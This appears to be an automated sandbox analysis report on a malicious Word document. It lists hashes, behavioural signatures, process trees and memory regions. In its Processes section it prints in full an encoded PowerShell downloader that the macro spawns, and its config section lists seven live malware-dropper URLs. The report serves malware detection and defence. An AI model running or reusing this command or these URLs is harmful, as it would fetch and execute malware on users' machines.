Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    14/05/2024, 08:22

General

  • Target

    40d513ec1e7f35b3c5733764c44e5396_JaffaCakes118.doc

  • Size

    188KB

  • MD5

    40d513ec1e7f35b3c5733764c44e5396

  • SHA1

    e19b15d04e171c985f67ba0877a238dc0f9acff2

  • SHA256

    6ff366285d622219f742ce3c99e9aa090b1f56a23015be5cdbf273a4abc440a8

  • SHA512

    f88e74502d08882ff8ec1dbdbd6734aff92ed53e0962d7ef7c32ecab737c489253d4436453e81c91a3a2cfd968b2677d9e61abc6b2d69e5dfccd0757b4a9b016

  • SSDEEP

    1536:5GGGGGGGGGG2xJLEt+LaaGGGGGGGGGGjLo9xilWfm9ITmDST/Ephs7p8cEpY/d8x:M8rfrzOH98ipgJLTOZ

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://amettatravel.com/wp-admin/1/

exe.dropper

http://iqauthority.com/wp-admin/9Id/

exe.dropper

http://www.sifesro.com/wp-includes/o/

exe.dropper

http://oneinsix.com/test/0/

exe.dropper

https://dramacool9.live/scbvq1/sPT/

exe.dropper

http://blog.geekpai.top/rmebw/x/

exe.dropper

https://datxanhmienbac.info/lfb8ii/LmG/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 7 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\40d513ec1e7f35b3c5733764c44e5396_JaffaCakes118.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:1984
  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -encod JABBAHIAbQAwADIAZgBfAD0AKAAnAFcAdQAnACsAKAAnAG0AdgBhAGQAJwArACcAeAAnACkAKQA7AC4AKAAnAG4AZQB3AC0AaQB0AGUAJwArACcAbQAnACkAIAAkAEUATgBWADoAVQBTAEUAUgBQAHIATwBmAEkAbABFAFwAdwBUAG0AcwBzADkAVgBcAFgAZgA1AFYAVQBnADYAXAAgAC0AaQB0AGUAbQB0AHkAcABlACAARABpAHIARQBjAFQATwBSAHkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAHMAYABFAGMAYABVAHIASQBUAFkAUAByAGAATwBUAE8AQwBPAEwAIgAgAD0AIAAoACcAdAAnACsAKAAnAGwAcwAnACsAJwAxACcAKQArACgAJwAyACwAJwArACcAIAB0ACcAKQArACcAbAAnACsAKAAnAHMAMQAnACsAJwAxACwAJwApACsAKAAnACAAdAAnACsAJwBsAHMAJwApACkAOwAkAE4AcwBqAGkAdwB5AF8AIAA9ACAAKAAnAE0AcwAnACsAJwB3AGUAJwArACgAJwBwACcAKwAnAGgAZAAwAHMAJwApACkAOwAkAEYAdAA4ADgAdwBuAHkAPQAoACcARgBlACcAKwAoACcAbQBiACcAKwAnAG4AJwApACsAJwAxAHQAJwApADsAJABYAGMAcgBkAHkAMQBzAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACgAKAAnAHsAJwArACcAMAB9AFcAdAAnACsAKAAnAG0AcwBzACcAKwAnADkAdgAnACkAKwAnAHsAMAB9AFgAZgA1AHYAdQBnACcAKwAnADYAewAwAH0AJwApACAALQBmACAAIABbAEMASABBAFIAXQA5ADIAKQArACQATgBzAGoAaQB3AHkAXwArACgAJwAuAGUAJwArACcAeABlACcAKQA7ACQAUQA5AHYAXwBoADQAcwA9ACgAJwBDACcAKwAoACcAYwAnACsAJwB1ADEAJwApACsAKAAnAF8AJwArACcANQBvACcAKQApADsAJABEADIAYwBpAGEAaQBpAD0ALgAoACcAbgBlAHcALQBvACcAKwAnAGIAagBlACcAKwAnAGMAdAAnACkAIABOAGUAdAAuAFcAZQBCAGMAbABpAEUAbgBUADsAJABZAG0AMQA3AGQAawBsAD0AKAAnAGgAdAAnACsAJwB0AHAAJwArACgAJwA6ACcAKwAnAC8ALwAnACkAKwAnAGEAbQAnACsAJwBlACcAKwAnAHQAdAAnACsAKAAnAGEAdAByACcAKwAnAGEAJwApACsAKAAnAHYAJwArACcAZQBsACcAKQArACgAJwAuAGMAJwArACcAbwAnACkAKwAnAG0AJwArACgAJwAvAHcAcAAtACcAKwAnAGEAZABtACcAKQArACgAJwBpACcAKwAnAG4ALwAxACcAKQArACcALwAnACsAKAAnACoAaAAnACsAJwB0ACcAKQArACcAdABwACcAKwAnADoALwAnACsAJwAvAGkAJwArACgAJwBxAGEAdQB0AGgAJwArACcAbwByAGkAJwArACcAdAB5ACcAKQArACgAJwAuAGMAJwArACcAbwAnACkAKwAoACcAbQAvAHcAcAAnACsAJwAtACcAKQArACcAYQAnACsAKAAnAGQAbQAnACsAJwBpAG4AJwArACcALwA5AEkAZAAnACkAKwAnAC8AKgAnACsAJwBoACcAKwAnAHQAdAAnACsAJwBwACcAKwAoACcAOgAvACcAKwAnAC8AdwAnACkAKwAoACcAdwB3AC4AcwBpACcAKwAnAGYAJwArACcAZQAnACkAKwAoACcAcwByACcAKwAnAG8AJwApACsAJwAuAGMAJwArACgAJwBvAG0ALwAnACsAJwB3ACcAKQArACgAJwBwACcAKwAnAC0AaQBuAGMAbAAnACkAKwAoACcAdQAnACsAJwBkAGUAJwApACsAJwBzAC8AJwArACcAbwAnACsAJwAvACoAJwArACcAaAB0ACcAKwAnAHQAcAAnACsAKAAnADoAJwArACcALwAvAG8AJwArACcAbgBlAGkAJwApACsAKAAnAG4AcwAnACsAJwBpAHgAJwApACsAKAAnAC4AYwAnACsAJwBvAG0AJwArACcALwAnACsAJwB0AGUAcwB0AC8AMAAvACcAKQArACgAJwAqAGgAdAB0AHAAJwArACcAcwA6AC8ALwAnACsAJwBkAHIAYQBtACcAKwAnAGEAJwArACcAYwBvACcAKwAnAG8AJwApACsAKAAnAGwAOQAnACsAJwAuACcAKQArACcAbABpACcAKwAnAHYAJwArACgAJwBlAC8AcwAnACsAJwBjAGIAdgAnACsAJwBxADEAJwArACcALwBzAFAAVAAnACkAKwAnAC8AKgAnACsAKAAnAGgAdAAnACsAJwB0AHAAJwApACsAKAAnADoALwAnACsAJwAvAGIAbAAnACkAKwAnAG8AZwAnACsAKAAnAC4AZwBlAGUAawBwACcAKwAnAGEAJwApACsAKAAnAGkALgB0AG8AcAAvAHIAJwArACcAbQAnACkAKwAnAGUAJwArACcAYgB3ACcAKwAoACcALwAnACsAJwB4AC8AKgBoACcAKwAnAHQAdABwACcAKQArACgAJwBzACcAKwAnADoALwAnACkAKwAnAC8AJwArACgAJwBkAGEAJwArACcAdAAnACkAKwAnAHgAYQAnACsAJwBuACcAKwAnAGgAJwArACgAJwBtACcAKwAnAGkAZQAnACkAKwAoACcAbgBiACcAKwAnAGEAJwApACsAJwBjAC4AJwArACgAJwBpAG4AZgAnACsAJwBvAC8AbAAnACsAJwBmAGIAJwApACsAJwA4AGkAJwArACgAJwBpAC8AJwArACcATAAnACkAKwAnAG0AJwArACcARwAnACsAJwAvACcAKQAuACIAUwBwAGwAYABpAHQAIgAoAFsAYwBoAGEAcgBdADQAMgApADsAJABMAHIAMABxAGwAMAAwAD0AKAAoACcAWABmADcAJwArACcAdABzACcAKQArACcAcQAnACsAJwBlACcAKQA7AGYAbwByAGUAYQBjAGgAKAAkAE4AcgB3AHIAeAAyADEAIABpAG4AIAAkAFkAbQAxADcAZABrAGwAKQB7AHQAcgB5AHsAJABEADIAYwBpAGEAaQBpAC4AIgBEAGAAbwBXAE4AbABvAEEARABmAGAASQBgAEwAZQAiACgAJABOAHIAdwByAHgAMgAxACwAIAAkAFgAYwByAGQAeQAxAHMAKQA7ACQATwBrAHUAZgBvAHQAZAA9ACgAJwBBACcAKwAoACcAOAA0ACcAKwAnAHUAJwApACsAKAAnADQAOQAnACsAJwA3ACcAKQApADsASQBmACAAKAAoAC4AKAAnAEcAJwArACcAZQB0AC0ASQAnACsAJwB0AGUAbQAnACkAIAAkAFgAYwByAGQAeQAxAHMAKQAuACIATABgAEUATgBgAEcAdABIACIAIAAtAGcAZQAgADIANwA2ADUAMwApACAAewAmACgAJwBJAG4AdgBvACcAKwAnAGsAZQAtAEkAJwArACcAdABlAG0AJwApACgAJABYAGMAcgBkAHkAMQBzACkAOwAkAFoAdgA4ADMAYwA0AHoAPQAoACgAJwBQAGMAYgAnACsAJwA4ACcAKwAnADAAcgAnACkAKwAnAHgAJwApADsAYgByAGUAYQBrADsAJABSAGYAMQBqAGkAMAA5AD0AKAAnAE8AJwArACgAJwBwAHAAJwArACcAZgBvACcAKQArACcAZwBfACcAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQATgA0AHUANwBpAGUAcwA9ACgAKAAnAFcAZwA1AHEAJwArACcAYgAnACkAKwAnAHMAYwAnACkA
    1⤵
    • Process spawned unexpected child process
    • Blocklisted process makes network request
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:452

Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\TCDC7D3.tmp\iso690.xsl

          Filesize

          263KB

          MD5

          ff0e07eff1333cdf9fc2523d323dd654

          SHA1

          77a1ae0dd8dbc3fee65dd6266f31e2a564d088a4

          SHA256

          3f925e0cc1542f09de1f99060899eafb0042bb9682507c907173c392115a44b5

          SHA512

          b4615f995fab87661c2dbe46625aa982215d7bde27cafae221dca76087fe76da4b4a381943436fcac1577cb3d260d0050b32b7b93e3eb07912494429f126bb3d

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_f5ah4pxn.d5q.ps1

          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        • memory/452-78-0x000001447D8D0000-0x000001447D8F2000-memory.dmp

          Filesize

          136KB

        • memory/1984-18-0x00007FFBA0750000-0x00007FFBA0945000-memory.dmp

          Filesize

          2.0MB

        • memory/1984-14-0x00007FFB5E600000-0x00007FFB5E610000-memory.dmp

          Filesize

          64KB

        • memory/1984-6-0x00007FFBA0750000-0x00007FFBA0945000-memory.dmp

          Filesize

          2.0MB

        • memory/1984-3-0x00007FFB607D0000-0x00007FFB607E0000-memory.dmp

          Filesize

          64KB

        • memory/1984-7-0x00007FFBA0750000-0x00007FFBA0945000-memory.dmp

          Filesize

          2.0MB

        • memory/1984-10-0x00007FFBA0750000-0x00007FFBA0945000-memory.dmp

          Filesize

          2.0MB

        • memory/1984-9-0x00007FFBA0750000-0x00007FFBA0945000-memory.dmp

          Filesize

          2.0MB

        • memory/1984-11-0x00007FFB5E600000-0x00007FFB5E610000-memory.dmp

          Filesize

          64KB

        • memory/1984-8-0x00007FFBA0750000-0x00007FFBA0945000-memory.dmp

          Filesize

          2.0MB

        • memory/1984-34-0x00007FFBA0750000-0x00007FFBA0945000-memory.dmp

          Filesize

          2.0MB

        • memory/1984-12-0x00007FFBA0750000-0x00007FFBA0945000-memory.dmp

          Filesize

          2.0MB

        • memory/1984-17-0x00007FFBA0750000-0x00007FFBA0945000-memory.dmp

          Filesize

          2.0MB

        • memory/1984-16-0x00007FFBA0750000-0x00007FFBA0945000-memory.dmp

          Filesize

          2.0MB

        • memory/1984-19-0x00007FFBA0750000-0x00007FFBA0945000-memory.dmp

          Filesize

          2.0MB

        • memory/1984-22-0x00007FFBA0750000-0x00007FFBA0945000-memory.dmp

          Filesize

          2.0MB

        • memory/1984-21-0x00007FFBA0750000-0x00007FFBA0945000-memory.dmp

          Filesize

          2.0MB

        • memory/1984-20-0x00007FFBA0750000-0x00007FFBA0945000-memory.dmp

          Filesize

          2.0MB

        • memory/1984-0-0x00007FFB607D0000-0x00007FFB607E0000-memory.dmp

          Filesize

          64KB

        • memory/1984-5-0x00007FFB607D0000-0x00007FFB607E0000-memory.dmp

          Filesize

          64KB

        • memory/1984-15-0x00007FFBA0750000-0x00007FFBA0945000-memory.dmp

          Filesize

          2.0MB

        • memory/1984-13-0x00007FFBA0750000-0x00007FFBA0945000-memory.dmp

          Filesize

          2.0MB

        • memory/1984-35-0x00007FFBA0750000-0x00007FFBA0945000-memory.dmp

          Filesize

          2.0MB

        • memory/1984-62-0x00007FFBA0750000-0x00007FFBA0945000-memory.dmp

          Filesize

          2.0MB

        • memory/1984-63-0x00007FFBA0750000-0x00007FFBA0945000-memory.dmp

          Filesize

          2.0MB

        • memory/1984-64-0x00007FFBA0750000-0x00007FFBA0945000-memory.dmp

          Filesize

          2.0MB

        • memory/1984-1-0x00007FFB607D0000-0x00007FFB607E0000-memory.dmp

          Filesize

          64KB

        • memory/1984-4-0x00007FFBA07ED000-0x00007FFBA07EE000-memory.dmp

          Filesize

          4KB

        • memory/1984-93-0x00007FFBA0750000-0x00007FFBA0945000-memory.dmp

          Filesize

          2.0MB

        • memory/1984-94-0x00007FFBA0750000-0x00007FFBA0945000-memory.dmp

          Filesize

          2.0MB

        • memory/1984-95-0x00007FFBA0750000-0x00007FFBA0945000-memory.dmp

          Filesize

          2.0MB

        • memory/1984-96-0x00007FFBA0750000-0x00007FFBA0945000-memory.dmp

          Filesize

          2.0MB

        • memory/1984-97-0x00007FFBA0750000-0x00007FFBA0945000-memory.dmp

          Filesize

          2.0MB

        • memory/1984-2-0x00007FFB607D0000-0x00007FFB607E0000-memory.dmp

          Filesize

          64KB

        • memory/1984-597-0x00007FFB607D0000-0x00007FFB607E0000-memory.dmp

          Filesize

          64KB

        • memory/1984-600-0x00007FFB607D0000-0x00007FFB607E0000-memory.dmp

          Filesize

          64KB

        • memory/1984-599-0x00007FFB607D0000-0x00007FFB607E0000-memory.dmp

          Filesize

          64KB

        • memory/1984-598-0x00007FFB607D0000-0x00007FFB607E0000-memory.dmp

          Filesize

          64KB

        • memory/1984-601-0x00007FFBA0750000-0x00007FFBA0945000-memory.dmp

          Filesize

          2.0MB